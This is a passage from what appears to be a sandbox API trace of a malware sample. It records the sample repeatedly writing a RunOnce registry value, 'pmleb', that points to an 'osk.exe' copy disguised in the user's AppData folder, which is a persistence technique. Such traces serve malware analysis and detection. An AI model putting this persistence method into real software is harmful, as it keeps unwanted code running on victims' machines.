HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0105.260] RegCloseKey (hKey=0x280) returned 0x0 [0105.261] IUnknown:Release (This=0x7a9740) returned 0x1 [0105.261] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.261] SetTimer (hWnd=0x20280, nIDEvent=0x2419, uElapse=0xa, lpTimerFunc=0x0) returned 0x2419 [0105.261] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0105.276] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0105.276] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0105.276] KillTimer (hWnd=0x20280, uIDEvent=0x2419) returned 1 [0105.276] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.277] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0105.277] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0105.277] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0105.277] RegCloseKey (hKey=0x280) returned 0x0 [0105.278] IUnknown:Release (This=0x7a9740) returned 0x1 [0105.278] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.278] SetTimer (hWnd=0x20280, nIDEvent=0x241a, uElapse=0xa, lpTimerFunc=0x0) returned 0x241a [0105.278] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0105.290] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0105.290] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0105.290] KillTimer (hWnd=0x20280, uIDEvent=0x241a) returned 1 [0105.290] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.291] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0105.291] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0105.291] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0105.291] RegCloseKey (hKey=0x280) returned 0x0 [0105.291] IUnknown:Release (This=0x7a9740) returned 0x1 [0105.292] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.292] SetTimer (hWnd=0x20280, nIDEvent=0x241b, uElapse=0xa, lpTimerFunc=0x0) returned 0x241b [0105.292] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0105.306] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0105.306] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0105.306] KillTimer (hWnd=0x20280, uIDEvent=0x241b) returned 1 [0105.306] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.307] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0105.307] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0105.307] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0105.307] RegCloseKey (hKey=0x280) returned 0x0 [0105.307] IUnknown:Release (This=0x7a9740) returned 0x1 [0105.307] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.308] SetTimer (hWnd=0x20280, nIDEvent=0x241c, uElapse=0xa, lpTimerFunc=0x0) returned 0x241c [0105.308] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0105.321] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0105.321] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0105.321] KillTimer (hWnd=0x20280, uIDEvent=0x241c) returned 1 [0105.321] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.322] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0105.322] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0105.322] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0105.322] RegCloseKey (hKey=0x280) returned 0x0 [0105.323] IUnknown:Release (This=0x7a9740) returned 0x1 [0105.323] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.323] SetTimer (hWnd=0x20280, nIDEvent=0x241d, uElapse=0xa, lpTimerFunc=0x0) returned 0x241d [0105.323] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0105.337] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0105.337] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0105.337] KillTimer (hWnd=0x20280, uIDEvent=0x241d) returned 1 [0105.338] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.338] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0105.338] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0105.338] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0105.338] RegCloseKey (hKey=0x280) returned 0x0 [0105.339] IUnknown:Release (This=0x7a9740) returned 0x1 [0105.339] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0105.339] SetTimer (hWnd=0x20280, nIDEvent=0x241e, uElapse=0xa, lpTimerFunc=0x0) returned 0x241e [0105.339] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.289] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.289] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.289] KillTimer (hWnd=0x20280, uIDEvent=0x241e) returned 1 [0108.290] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.291] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.291] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.292] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.292] RegCloseKey (hKey=0x280) returned 0x0 [0108.292] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.292] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.292] SetTimer (hWnd=0x20280, nIDEvent=0x241f, uElapse=0xa, lpTimerFunc=0x0) returned 0x241f [0108.293] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.301] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.301] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.301] KillTimer (hWnd=0x20280, uIDEvent=0x241f) returned 1 [0108.301] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.301] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.302] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.302] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.302] RegCloseKey (hKey=0x280) returned 0x0 [0108.302] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.302] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.302] SetTimer (hWnd=0x20280, nIDEvent=0x2420, uElapse=0xa, lpTimerFunc=0x0) returned 0x2420 [0108.302] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.316] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.316] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.317] KillTimer (hWnd=0x20280, uIDEvent=0x2420) returned 1 [0108.317] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.317] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.317] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.318] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.318] RegCloseKey (hKey=0x280) returned 0x0 [0108.318] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.318] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.318] SetTimer (hWnd=0x20280, nIDEvent=0x2421, uElapse=0xa, lpTimerFunc=0x0) returned 0x2421 [0108.318] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.332] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.332] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.332] KillTimer (hWnd=0x20280, uIDEvent=0x2421) returned 1 [0108.332] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.333] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.333] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.333] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.333] RegCloseKey (hKey=0x280) returned 0x0 [0108.333] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.334] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.334] SetTimer (hWnd=0x20280, nIDEvent=0x2422, uElapse=0xa, lpTimerFunc=0x0) returned 0x2422 [0108.334] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.348] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.348] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.348] KillTimer (hWnd=0x20280, uIDEvent=0x2422) returned 1 [0108.348] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.348] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.348] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.349] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.349] RegCloseKey (hKey=0x280) returned 0x0 [0108.349] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.349] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.349] SetTimer (hWnd=0x20280, nIDEvent=0x2423, uElapse=0xa, lpTimerFunc=0x0) returned 0x2423 [0108.349] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.363] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.363] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.363] KillTimer (hWnd=0x20280, uIDEvent=0x2423) returned 1 [0108.363] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.364] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.364] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.364] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.364] RegCloseKey (hKey=0x280) returned 0x0 [0108.364] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.365] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.365] SetTimer (hWnd=0x20280, nIDEvent=0x2424, uElapse=0xa, lpTimerFunc=0x0) returned 0x2424 [0108.365] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.379] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.379] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.379] KillTimer (hWnd=0x20280, uIDEvent=0x2424) returned 1 [0108.379] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.380] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.380] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.380] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.380] RegCloseKey (hKey=0x280) returned 0x0 [0108.380] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.380] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.380] SetTimer (hWnd=0x20280, nIDEvent=0x2425, uElapse=0xa, lpTimerFunc=0x0) returned 0x2425 [0108.380] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.438] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.438] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.438] KillTimer (hWnd=0x20280, uIDEvent=0x2425) returned 1 [0108.438] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.439] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.439] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.439] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.439] RegCloseKey (hKey=0x280) returned 0x0 [0108.440] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.440] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.440] SetTimer (hWnd=0x20280, nIDEvent=0x2426, uElapse=0xa, lpTimerFunc=0x0) returned 0x2426 [0108.440] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.443] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.443] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.443] KillTimer (hWnd=0x20280, uIDEvent=0x2426) returned 1 [0108.443] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.444] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.444] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.444] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.444] RegCloseKey (hKey=0x280) returned 0x0 [0108.444] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.444] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.445] SetTimer (hWnd=0x20280, nIDEvent=0x2427, uElapse=0xa, lpTimerFunc=0x0) returned 0x2427 [0108.445] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.458] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.458] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.458] KillTimer (hWnd=0x20280, uIDEvent=0x2427) returned 1 [0108.458] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.459] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.459] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.459] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.459] RegCloseKey (hKey=0x280) returned 0x0 [0108.459] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.460] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.460] SetTimer (hWnd=0x20280, nIDEvent=0x2428, uElapse=0xa, lpTimerFunc=0x0) returned 0x2428 [0108.460] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.473] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.473] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.474] KillTimer (hWnd=0x20280, uIDEvent=0x2428) returned 1 [0108.474] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.474] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.474] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.475] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.475] RegCloseKey (hKey=0x280) returned 0x0 [0108.475] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.475] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.475] SetTimer (hWnd=0x20280, nIDEvent=0x2429, uElapse=0xa, lpTimerFunc=0x0) returned 0x2429 [0108.475] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.489] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.489] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.489] KillTimer (hWnd=0x20280, uIDEvent=0x2429) returned 1 [0108.489] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.490] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.490] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.490] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.490] RegCloseKey (hKey=0x280) returned 0x0 [0108.490] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.490] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.490] SetTimer (hWnd=0x20280, nIDEvent=0x242a, uElapse=0xa, lpTimerFunc=0x0) returned 0x242a [0108.491] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.505] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.505] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.505] KillTimer (hWnd=0x20280, uIDEvent=0x242a) returned 1 [0108.505] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.506] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.506] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.506] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.506] RegCloseKey (hKey=0x280) returned 0x0 [0108.506] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.506] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.507] SetTimer (hWnd=0x20280, nIDEvent=0x242b, uElapse=0xa, lpTimerFunc=0x0) returned 0x242b [0108.507] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.520] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.520] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.520] KillTimer (hWnd=0x20280, uIDEvent=0x242b) returned 1 [0108.521] 